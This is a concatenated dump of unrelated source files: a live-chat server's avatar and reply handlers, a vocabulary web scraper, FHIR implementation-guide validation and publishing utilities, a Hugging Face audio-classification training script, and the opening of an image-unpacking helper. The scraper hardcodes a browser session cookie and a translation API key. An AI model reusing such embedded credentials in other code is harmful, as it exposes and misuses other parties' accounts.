except (aiohttp.ClientConnectionError, asyncio.TimeoutError):
logger.exception('room %d _get_room_info failed', room_id)
return room_id, 0
if data['code'] != 0:
logger.warning('room %d _get_room_info failed: %s', room_id, data['message'])
return room_id, 0
room_info = data['data']['room_info']
return room_info['room_id'], room_info['uid']
@classmethod
async def _get_server_host_list(cls, _room_id):
return cls._host_server_list_cache
        # Connecting to other hosts requires a key
# try:
# async with _http_session.get(blivedm.DANMAKU_SERVER_CONF_URL, params={'id': room_id, 'type': 0}
# ) as res:
# if res.status != 200:
# logger.warning('room %d _get_server_host_list failed: %d %s', room_id,
# res.status, res.reason)
# return cls._host_server_list_cache
# data = await res.json()
# except (aiohttp.ClientConnectionError, asyncio.TimeoutError):
# logger.exception('room %d _get_server_host_list failed', room_id)
# return cls._host_server_list_cache
#
# if data['code'] != 0:
# logger.warning('room %d _get_server_host_list failed: %s', room_id, data['message'])
# return cls._host_server_list_cache
#
# host_server_list = data['data']['host_list']
# if not host_server_list:
# logger.warning('room %d _get_server_host_list failed: host_server_list is empty')
# return cls._host_server_list_cache
#
# cls._host_server_list_cache = host_server_list
# return host_server_list
# noinspection PyAbstractClass
class AvatarHandler(api.base.ApiHandler):
async def get(self):
uid = int(self.get_query_argument('uid'))
avatar_url = await models.avatar.get_avatar_url_or_none(uid)
if avatar_url is None:
avatar_url = models.avatar.DEFAULT_AVATAR_URL
            # Cache for 3 minutes
self.set_header('Cache-Control', 'private, max-age=180')
else:
            # Cache for 1 day
self.set_header('Cache-Control', 'private, max-age=86400')
self.write({
'avatarUrl': avatar_url
})
# noinspection PyAbstractClass
# handle reply message
class ReplyHandler(api.base.ApiHandler):
def get(self):
self.write('pong')
async def post(self):
uid = None if self.json_args['uid'] == -1 else self.json_args['uid']
avatar_url = await models.avatar.get_avatar_url(uid)
text_message = make_text_message(
avatar_url=avatar_url,
timestamp=int(time.time()),
author_name=self.json_args['name'],
author_type=3,
content=self.json_args['content'],
author_level=0,
id_=uuid.uuid4().hex,
privilege_type=0,
is_newbie=0,
is_gift_danmaku=0,
is_mobile_verified=True,
medal_level=0,
            translation=''
)
# get room
room: Room = await room_manager.get_room(room_id=self.json_args['room_id'])
room.send_message(Command.ADD_TEXT, text_message)
```
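The ADD_TEXT payload above is packed as a positional list rather than a dict to save bandwidth. Below is a minimal client-side sketch of decoding such a frame back into named fields; the field order is taken from the index comments in `make_text_message`, while the numeric `cmd` value is a made-up placeholder, not the real `Command.ADD_TEXT` constant.
```python
import json

# Field order copied from the index comments in make_text_message
TEXT_FIELDS = [
    'avatarUrl', 'timestamp', 'authorName', 'authorType', 'content',
    'privilegeType', 'isGiftDanmaku', 'authorLevel', 'isNewbie',
    'isMobileVerified', 'medalLevel', 'id', 'translation',
]

def decode_text_message(frame: str) -> dict:
    """Turn a raw ADD_TEXT websocket frame back into a dict of named fields."""
    body = json.loads(frame)
    return dict(zip(TEXT_FIELDS, body['data']))

# Example frame; cmd value 2 is a placeholder for illustration only
frame = json.dumps({'cmd': 2, 'data': ['url', 0, 'alice', 0, 'hi', 0, 0, 1, 0, 1, 0, 'abc1', '']})
print(decode_text_message(frame))
```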
|
{
"source": "Jecosine/VocabularyX-Dev",
"score": 2
}
|
#### File: VocabularyX-Dev/ScrappingTool/main.py
```python
import os
import sqlite3
from models import *
import json
from bs4 import BeautifulSoup as bs
import requests
url = 'https://www.quword.com/w/{}'
api = 'https://fanyi.youdao.com/openapi.do?type=data&doctype=jsonp&version=1.1&keyfrom=neteaseopen&key=1532272597&callback=?&q='
header = {
'Host': 'www.quword.com',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'sec-ch-ua': '"Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"',
'sec-ch-ua-mobile': '?0',
'DNT': '1',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document',
'Referer': 'https://www.quword.com/tags/GRE',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Cookie': 'UM_distinctid=176e8e0fd15154-014f77fed1989e-c791039-144000-176e8e0fd16563; Hm_lvt_b98d5a4c985b16117a3eb5bd26322264=1610224828,1612656986; CNZZDATA1278225540=1105745206-1610223608-https%253A%252F%252Fwww.baidu.com%252F%7C1612664111; m_lpvt_b98d5a4c985b16117a3eb5bd26322264=1612667939'
}
"""return @param word: class Word"""
def query_word(text):
res = requests.get(url.format(text), headers = header)
bsobj = bs(res.text, 'html.parser')
word = Word(text)
word.parse(bsobj)
```
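`query_word` delegates the actual HTML parsing to `models.Word`, which is not shown here. A rough standalone sketch of the same fetch-and-scrape flow; the idea that definitions live in `<li>` tags is an assumption about quword.com's markup, not taken from the real `Word.parse`.
```python
import requests
from bs4 import BeautifulSoup

def fetch_definitions(text):
    """Fetch a quword.com word page and pull out candidate definition strings."""
    res = requests.get('https://www.quword.com/w/{}'.format(text),
                       headers={'User-Agent': 'Mozilla/5.0'})
    soup = BeautifulSoup(res.text, 'html.parser')
    # Assumption for illustration: definition lines appear inside <li> tags
    return [li.get_text(strip=True) for li in soup.find_all('li')]

if __name__ == '__main__':
    print(fetch_definitions('example')[:5])
```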
#### File: ScrappingTool/models/source.py
```python
import json
class Source:
def __init__(self):
self.stype = ''
self.title = ''
self.description = ''
"""
Convert html parser(dl) to object
"""
def parser(self, html_parser):
self.title = html_parser.find()
```
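The `parser` method above is left unfinished. A self-contained sketch of what the intended `<dl>` parsing could look like, assuming the title sits in the first `<dt>` and the description in the first `<dd>` (the real markup may differ):
```python
from bs4 import BeautifulSoup

def parse_dl(html):
    """Sketch: extract title/description from a <dl> element."""
    dl = BeautifulSoup(html, 'html.parser').find('dl')
    return {
        'title': dl.find('dt').get_text(strip=True),
        'description': dl.find('dd').get_text(strip=True),
    }

print(parse_dl('<dl><dt>GRE</dt><dd>Words commonly tested on the GRE</dd></dl>'))
# {'title': 'GRE', 'description': 'Words commonly tested on the GRE'}
```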
|
{
"source": "jecos/ncpi-fhir-utility",
"score": 2
}
|
#### File: ncpi-fhir-utility/ncpi_fhir_utility/app.py
```python
from collections import defaultdict
from copy import deepcopy
from pprint import pformat
import os
import logging
import subprocess
from shutil import rmtree
from configparser import ConfigParser
from requests.auth import HTTPBasicAuth
from ncpi_fhir_utility.oauth import OAuth
from ncpi_fhir_utility.utils import read_json, write_json, camel_to_snake
from ncpi_fhir_utility import loader
from ncpi_fhir_utility.client import FhirApiClient
from ncpi_fhir_utility.config import (
RUN_IG_PUBLISHER_SCRIPT,
CONFORMANCE_RESOURCES,
RESOURCE_SUBMISSION_ORDER,
)
RESOURCE_ID_DELIM = "-"
FILENAME_DELIM = RESOURCE_ID_DELIM
logger = logging.getLogger(__name__)
def validate(
ig_control_filepath,
clear_output=False,
publisher_opts="",
refresh_publisher=True,
):
"""
Validate the FHIR data model (FHIR conformance and example resources)
Run the HL7 FHIR implementation guide (IG) publisher in a Docker container
to validate conformance resources and any example resources against the
conformance resources.
See https://confluence.hl7.org/display/FHIR/IG+Publisher+Documentation
Validation fails if any of the following are true:
- The publisher returns a non-zero exit code
- QA report contains errors with the FHIR resources.
- Any one of the resource files fail model validation in
_custom_validate
IG build errors are ignored since this method only validates the data
model
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param clear_output: Whether to clear all generated output before
validating
:type clear_output: boolean
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
logger.info("Begin validation of FHIR data model")
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
# Clear previously generated output
if clear_output:
clear_ig_output(ig_control_filepath)
# Read in ig resource file
ig_resource_dict = _load_ig_resource_dict(ig_control_filepath)
# Collect resource filepaths
resource_dicts = []
site_root = os.path.dirname(ig_control_filepath)
ig = ig_resource_dict["content"]
for param in ig.get("definition", {}).get("parameter", []):
if param.get("code") != "path-resource":
continue
resource_dicts.extend(
loader.load_resources(os.path.join(site_root, param.get("value")))
)
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Add entry to IG configuration
_update_ig_config(resource_dicts, ig_resource_dict, add=True)
# Do the standard HL7 FHIR validation via the IG Publisher
_fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher)
logger.info("End validation of FHIR data model")
def clear_ig_output(ig_control_filepath):
"""
Delete all of the output dirs generated by the IG publisher
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
"""
site_root = os.path.dirname(ig_control_filepath)
for dir in ["output", "temp", "template", "input-cache"]:
p = os.path.join(site_root, dir)
if os.path.exists(p):
logger.info(f"Clearing all previously generated output at: {p}")
rmtree(p)
def update_ig_config(data_path, ig_control_filepath, add=True, rm_file=False):
"""
Add/remove the configuration entries to/from IG resource file for all
resources in data_path.
Optional - delete the resource file(s). Only applies if add=False.
When a new resource file is added to the IG it will not be picked up for
validation or site generation by the IG publisher unless the expected
configuration for that resource is present.
:param data_path: Path to directory or file containing resource(s) to
remove from the IG configuration
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param add: Whether to add the configuration versus remove it
:type add: bool
:param rm_file: Whether to delete the resource file(s). Only applies if
add=False
:type rm_file: bool
"""
# Load resource dicts
resource_dicts = loader.load_resources(data_path)
# Load IG resource dict
ig_resource_dict = deepcopy(_load_ig_resource_dict(ig_control_filepath))
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Update the IG configuration
    _update_ig_config(resource_dicts, ig_resource_dict, add=add, rm_file=rm_file)
def publish_to_server(
resource_file_or_dir,
base_url,
username=None,
    password=None,
oauth_url=None,
oauth_client_id=None,
oauth_client_secret=None,
oauth_uma_audience=None,
fhir_version=None,
submission_order=RESOURCE_SUBMISSION_ORDER,
):
"""
Push FHIR resources to a FHIR server
Delete the resources if they exist on the server
PUT any resources that have an `id` attribute defined
POST any resources that do not have an `id` attribute defined
:param resource_file_or_dir: path to a directory containing FHIR resource
files or path to a single resource file
:type resource_file_or_dir: str
:param username: Server account username
:param oauth_url: OAuth provider url used to get an access token
:type oauth_url: str
:param oauth_client_id: OAuth client id
:type oauth_client_id: str
:param oauth_client_secret: OAuth client secret
:type oauth_client_secret: str
:param oauth_uma_audience: OAuth audience to use to get an UMA ticket. If not present, a singular access token
is used.
:type oauth_uma_audience: str
:type username: str
:param password: Server account password
:type password: str
:param fhir_version: FHIR version number
:type fhir_version: str
"""
logger.info(
f"Begin publishing resources in {resource_file_or_dir} to {base_url}"
)
if username and password:
auth = HTTPBasicAuth(username, password)
elif oauth_url and oauth_client_id and oauth_client_secret:
auth = OAuth(oauth_url, oauth_client_id, oauth_client_secret, oauth_uma_audience)
else:
auth = None
client = FhirApiClient(
base_url=base_url, auth=auth, fhir_version=fhir_version
)
resources = loader.load_resources(resource_file_or_dir)
# Re-order resources according to submission order
resources_by_type = defaultdict(list)
for r_dict in resources:
resources_by_type[r_dict["resource_type"]].append(r_dict)
resources = []
for r_type in submission_order:
resources.extend(resources_by_type.pop(r_type, []))
for r_type, remaining in resources_by_type.items():
resources.extend(remaining)
# Delete existing resources
for r_dict in resources:
r = r_dict["content"]
if "url" in r:
success = client.delete_all(
f'{base_url}/{r["resourceType"]}', params={"url": r["url"]}
)
elif "id" in r:
success, results = client.send_request(
"delete", f'{base_url}/{r["resourceType"]}/{r["id"]}'
)
else:
logger.warning(
f'⚠️ Could not delete {r_dict["filename"]}. No way to '
"identify the resource. Tried looking for `url` and `id` in "
"payload."
)
    # POST if no id is provided, PUT if id is provided
for r_dict in resources:
r = r_dict["content"]
id_ = r.get("id")
if id_:
success, results = client.send_request(
"put", f'{base_url}/{r["resourceType"]}/{id_}', json=r
)
else:
success, results = client.send_request(
"post", f'{base_url}/{r["resourceType"]}', json=r
)
if not success:
errors = [
r
for r in results["response"]["issue"]
if r["severity"] == "error"
]
raise Exception(f"Publish failed! Caused by:\n{pformat(errors)}")
def _fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher):
"""
Run the HL7 IG Publisher to do standard FHIR validation on resource files
Called in validate
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
# Run IG publisher to do FHIR validation
args = [
RUN_IG_PUBLISHER_SCRIPT,
ig_control_filepath,
str(int(refresh_publisher)),
]
if publisher_opts:
args.append(publisher_opts)
subprocess.run(args, shell=False, check=True)
# Check QA report for validation errors
site_root = os.path.dirname(ig_control_filepath)
qa_path = os.path.join(site_root, "output", "qa")
qa_report = os.path.abspath(qa_path + ".html")
logger.info(f"Checking QA report {qa_report} for validation errors")
qa_json = read_json(qa_path + ".json")
if qa_json.get("errs"):
# Extract error messages from qa.txt
errors = []
with open(os.path.abspath(qa_path + ".txt")) as qa_txt:
for line in qa_txt.readlines():
ln = line.strip()
if ln.lower().startswith("error") and (".html" not in ln):
errors.append(ln)
errors = "\n".join(errors)
raise Exception(
f"Errors found in QA report. See {qa_report} for details:"
f"\n\n{errors}\n"
)
def _custom_validate(resource_dicts):
"""
Do custom validation of a resource file in the FHIR model
Called in validate
Validation Rules:
    1. JSON payload must have an `id` attribute populated with a value which
adheres to kebab-case
2. StructureDefinition must have `url` defined
3. StructureDefinition.id = StructureDefinition.url.split('/')[-1]
4. File name must follow format <resource type>-<resource id>
"""
for rd in resource_dicts:
res = rd["content"]
# Check if id is present
rid = res.get("id")
if not rid:
raise KeyError(
"All resources must have an `id` attribute. Resource file: "
f'{rd["filepath"]} is missing `id` or `id` is null.'
)
# If StructureDefinition check that URL is valid
if res["resourceType"] == "StructureDefinition":
if not res.get("url"):
raise KeyError(
"All StructureDefinition resources must have a `url`. "
f'Resource file: {rd["filepath"]} is missing `url` or '
"`url` is null."
)
url_parts = res.get("url").split("/")
if res["id"] != url_parts[-1]:
raise ValueError(
"Invalid value for `url` in StructureDefinition: "
f'{rd["filepath"]}. Value should be: '
f'{"/".join(url_parts + [res["id"]])}'
)
# Try to check if id follows kebab-case (won't be perfect)
expected_id = camel_to_snake(rid).replace("_", "-")
if rid != expected_id:
raise ValueError(
"Resource id must adhere to kebab-case (lowercase with "
f'hyphens between tokens). The `id` "{rid}" in '
f'{rd["filepath"]} should be: {expected_id}'
)
# Check filename
filename, ext = os.path.splitext(os.path.split(rd["filepath"])[-1])
rtype = rd.get("resource_type")
expected_filename = f"{rtype}-{rid}"
if filename != expected_filename:
raise ValueError(
"Resource file names must follow pattern: "
f"<resource type>-<resource id>.json. File {filename}{ext} "
f"should be: {expected_filename}{ext}"
)
logger.info(f"☑️ Initial validation passed for resource {filename + ext}")
def _update_ig_config(
resource_dicts, ig_resource_dict, add=True, rm_file=False
):
"""
Helper for update_ig_config
"""
# Collect resource ids from the input set of resources
resource_set = {
f'{r["content"]["resourceType"]}/{r["content"]["id"]}'
for r in resource_dicts
}
    # Reformat IG resource list into a dict so it's easier to update
ig_resource = ig_resource_dict["content"]
resources_dict = {}
for r in ig_resource["definition"]["resource"]:
        # Only include resources from IG config that have corresponding files
# Old IG entries will be discarded
key = r["reference"]["reference"]
if key in resource_set:
resources_dict[key] = r
else:
logger.info(f"🔥 Removing old entry {key} from IG")
for rd in resource_dicts:
if rd["resource_type"] == "ImplementationGuide":
continue
# Create the config entry
entry = _create_resource_config(rd, ig_resource.get("publisher"))
# Add/remove configuration entries
        if add:
            resources_dict[entry["reference"]["reference"]] = entry
            logger.info(f'☑️ Added IG configuration for {rd["filename"]}')
        else:
            del resources_dict[entry["reference"]["reference"]]
            if rm_file:
                os.remove(rd["filepath"])
                logger.info(f'🗑 Deleted resource file {rd["filepath"]}')
# Format resource dict back to original list
ig_resource["definition"]["resource"] = [
resources_dict[k] for k in resources_dict
]
write_json(
ig_resource_dict["content"], ig_resource_dict["filepath"], indent=2
)
def _create_resource_config(resource_dict, publisher=""):
"""
Create the expected IG configuration entry for a resource
:param resource_dict: The resource payload from which a config entry will
be created. See ncpi_fhir_utility.loader.load_resources.
:type resource_dict: dict
:param publisher: The value of ImplementationGuide.publisher
:type publisher: str
:returns: IG config entry for the resource
"""
rid = resource_dict["content"].get("id")
rtype = resource_dict["content"].get("resourceType")
suffix = ""
if rtype in CONFORMANCE_RESOURCES:
is_example = False
base = resource_dict["content"].get("baseDefinition")
if base:
base = base.split("/")[-1]
suffix = f", Base: {base}"
else:
is_example = True
profiles = ",".join(
[
p.split("/")[-1]
for p in resource_dict["content"]
.get("meta", {})
.get("profile", [])
]
)
if profiles:
suffix = f", Profiles: {profiles}"
if publisher:
publisher = publisher + " "
return {
"reference": {"reference": f"{rtype}/{rid}"},
"name": f"{publisher}{rtype}/{rid}",
"description": f"{publisher}{rtype} {rid}{suffix}",
"exampleBoolean": is_example,
}
def _load_ig_resource_dict(ig_control_filepath):
"""
Load IG resource JSON into a dict
Find the location of the IG resource file from the ig control file first
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:returns: IG resource dict
"""
# Read in ig control file
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
ig_config = ConfigParser()
ig_config.read(ig_control_filepath)
# Read in ig resource file
ig_filepath = os.path.join(
os.path.split(ig_control_filepath)[0], dict(ig_config["IG"]).get("ig")
)
return loader.load_resources(ig_filepath)[0]
```
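The kebab-case rule in `_custom_validate` relies on `camel_to_snake` from `ncpi_fhir_utility.utils`. A standalone sketch of that check; the regex-based `camel_to_snake` below is an assumption about what the helper does, written here only so the snippet runs on its own.
```python
import re

def camel_to_snake(name):
    # Assumed behavior of ncpi_fhir_utility.utils.camel_to_snake (a common regex idiom)
    s1 = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', name)
    return re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', s1).lower()

def expected_kebab_id(rid):
    """Mirror of the id rule used in _custom_validate."""
    return camel_to_snake(rid).replace('_', '-')

for rid in ('research-study', 'ResearchStudy', 'research_study'):
    expected = expected_kebab_id(rid)
    print(rid, '->', 'ok' if rid == expected else f'should be {expected}')
```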
|
{
"source": "jecoz/transformers",
"score": 2
}
|
#### File: pytorch/audio-classification/run_audio_classification.py
```python
import logging
import os
import sys
from dataclasses import dataclass, field
from random import randint
from typing import Optional
import datasets
import numpy as np
from datasets import DatasetDict, load_dataset
import transformers
from transformers import (
AutoConfig,
AutoFeatureExtractor,
AutoModelForAudioClassification,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risk.
check_min_version("4.14.0.dev0")
require_version("datasets>=1.14.0", "To fix: pip install -r examples/pytorch/audio-classification/requirements.txt")
def random_subsample(wav: np.ndarray, max_length: float, sample_rate: int = 16000):
"""Randomly sample chunks of `max_length` seconds from the input audio"""
sample_length = int(round(sample_rate * max_length))
if len(wav) <= sample_length:
return wav
random_offset = randint(0, len(wav) - sample_length - 1)
return wav[random_offset : random_offset + sample_length]
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
Using `HfArgumentParser` we can turn this class
into argparse arguments to be able to specify them on
the command line.
"""
dataset_name: Optional[str] = field(default=None, metadata={"help": "Name of a dataset from the datasets package"})
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(
default=None, metadata={"help": "A file containing the training audio paths and labels."}
)
eval_file: Optional[str] = field(
default=None, metadata={"help": "A file containing the validation audio paths and labels."}
)
train_split_name: Optional[str] = field(
default="train",
metadata={
"help": "The name of the training data set split to use (via the datasets library). Defaults to 'train'"
},
)
eval_split_name: Optional[str] = field(
default="validation",
metadata={
"help": "The name of the training data set split to use (via the datasets library). Defaults to "
"'validation'"
},
)
audio_column_name: Optional[str] = field(
default="audio",
metadata={"help": "The name of the dataset column containing the audio data. Defaults to 'audio'"},
)
label_column_name: Optional[str] = field(
default="label", metadata={"help": "The name of the dataset column containing the labels. Defaults to 'label'"}
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_length_seconds: Optional[float] = field(
default=20,
metadata={"help": "Audio clips will be randomly cut to this length during training if the value is set."},
)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
default="facebook/wav2vec2-base",
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from the Hub"}
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
feature_extractor_name: str = field(default=None, metadata={"help": "Name or path of preprocessor config."})
freeze_feature_extractor: Optional[bool] = field(
default=True, metadata={"help": "Whether to freeze the feature extractor layers of the model."}
)
attention_mask: Optional[bool] = field(
default=True, metadata={"help": "Whether to generate an attention mask in the feature extractor."}
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu} "
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
logger.info(f"Training/evaluation parameters {training_args}")
# Set seed before initializing model.
set_seed(training_args.seed)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to train from scratch."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Initialize our dataset and prepare it for the audio classification task.
raw_datasets = DatasetDict()
raw_datasets["train"] = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, split=data_args.train_split_name
)
raw_datasets["eval"] = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, split=data_args.eval_split_name
)
if data_args.audio_column_name not in raw_datasets["train"].column_names:
raise ValueError(
f"--audio_column_name {data_args.audio_column_name} not found in dataset '{data_args.dataset_name}'. "
"Make sure to set `--audio_column_name` to the correct audio column - one of "
f"{', '.join(raw_datasets['train'].column_names)}."
)
if data_args.label_column_name not in raw_datasets["train"].column_names:
raise ValueError(
f"--label_column_name {data_args.label_column_name} not found in dataset '{data_args.dataset_name}'. "
"Make sure to set `--label_column_name` to the correct text column - one of "
f"{', '.join(raw_datasets['train'].column_names)}."
)
# Setting `return_attention_mask=True` is the way to get a correctly masked mean-pooling over
# transformer outputs in the classifier, but it doesn't always lead to better accuracy
feature_extractor = AutoFeatureExtractor.from_pretrained(
model_args.feature_extractor_name or model_args.model_name_or_path,
return_attention_mask=model_args.attention_mask,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# `datasets` takes care of automatically loading and resampling the audio,
# so we just need to set the correct target sampling rate.
raw_datasets = raw_datasets.cast_column(
data_args.audio_column_name, datasets.features.Audio(sampling_rate=feature_extractor.sampling_rate)
)
def train_transforms(batch):
"""Apply train_transforms across a batch."""
output_batch = {"input_values": []}
for audio in batch[data_args.audio_column_name]:
wav = random_subsample(
audio["array"], max_length=data_args.max_length_seconds, sample_rate=feature_extractor.sampling_rate
)
output_batch["input_values"].append(wav)
output_batch["labels"] = [label for label in batch[data_args.label_column_name]]
return output_batch
def val_transforms(batch):
"""Apply val_transforms across a batch."""
output_batch = {"input_values": []}
for audio in batch[data_args.audio_column_name]:
wav = audio["array"]
output_batch["input_values"].append(wav)
output_batch["labels"] = [label for label in batch[data_args.label_column_name]]
return output_batch
# Prepare label mappings.
# We'll include these in the model's config to get human readable labels in the Inference API.
labels = raw_datasets["train"].features[data_args.label_column_name].names
label2id, id2label = dict(), dict()
for i, label in enumerate(labels):
label2id[label] = str(i)
id2label[str(i)] = label
# Load the accuracy metric from the datasets package
metric = datasets.load_metric("accuracy")
# Define our compute_metrics function. It takes an `EvalPrediction` object (a namedtuple with
# `predictions` and `label_ids` fields) and has to return a dictionary string to float.
def compute_metrics(eval_pred):
"""Computes accuracy on a batch of predictions"""
predictions = np.argmax(eval_pred.predictions, axis=1)
return metric.compute(predictions=predictions, references=eval_pred.label_ids)
config = AutoConfig.from_pretrained(
model_args.config_name or model_args.model_name_or_path,
num_labels=len(labels),
label2id=label2id,
id2label=id2label,
finetuning_task="audio-classification",
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
model = AutoModelForAudioClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# freeze the convolutional waveform encoder
if model_args.freeze_feature_extractor:
model.freeze_feature_extractor()
if training_args.do_train:
if data_args.max_train_samples is not None:
raw_datasets["train"] = (
raw_datasets["train"].shuffle(seed=training_args.seed).select(range(data_args.max_train_samples))
)
# Set the training transforms
raw_datasets["train"].set_transform(train_transforms, output_all_columns=False)
if training_args.do_eval:
if data_args.max_eval_samples is not None:
raw_datasets["eval"] = (
raw_datasets["eval"].shuffle(seed=training_args.seed).select(range(data_args.max_eval_samples))
)
# Set the validation transforms
raw_datasets["eval"].set_transform(val_transforms, output_all_columns=False)
# Initialize our trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=raw_datasets["train"] if training_args.do_train else None,
eval_dataset=raw_datasets["eval"] if training_args.do_eval else None,
compute_metrics=compute_metrics,
tokenizer=feature_extractor,
)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
trainer.save_model()
trainer.log_metrics("train", train_result.metrics)
trainer.save_metrics("train", train_result.metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
metrics = trainer.evaluate()
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
# Write model card and (optionally) push to hub
kwargs = {
"finetuned_from": model_args.model_name_or_path,
"tasks": "audio-classification",
"dataset": data_args.dataset_name,
"tags": ["audio-classification"],
}
if training_args.push_to_hub:
trainer.push_to_hub(**kwargs)
else:
trainer.create_model_card(**kwargs)
if __name__ == "__main__":
main()
```
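A quick illustration of what `random_subsample` does during training: it cuts a random fixed-length window out of a longer waveform. The helper is repeated inline and the audio is synthetic so the snippet runs by itself.
```python
import numpy as np
from random import randint

def random_subsample(wav, max_length, sample_rate=16000):
    sample_length = int(round(sample_rate * max_length))
    if len(wav) <= sample_length:
        return wav
    random_offset = randint(0, len(wav) - sample_length - 1)
    return wav[random_offset : random_offset + sample_length]

wav = np.random.randn(5 * 16000)            # 5 seconds of fake 16 kHz audio
clip = random_subsample(wav, max_length=2)  # randomly cut down to 2 seconds
print(len(wav), '->', len(clip))            # 80000 -> 32000
```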
|
{
"source": "je-c/pixel_reshaper",
"score": 3
}
|
#### File: je-c/pixel_reshaper/pixel_reshaper.py
```python
import numpy as np
from PIL import Image
import random, csv, os, shutil
def unpack_images(classNames, loc, dirName, splitPercent, dimImage, fileName, containsLabels=True, colorEncode='RGB', pixDtype='float64'):
"""
Unpack an image dataset stored as raw data (csv or otherwise) into .png's.
Creates file structure for easy data loading and handles train/test
splitting internally.
Time complexity - O(3k+N) for classes k, rows N.
Parameters
----------
classNames : list
list of class names
loc : str
location to unpack to
dirName : str
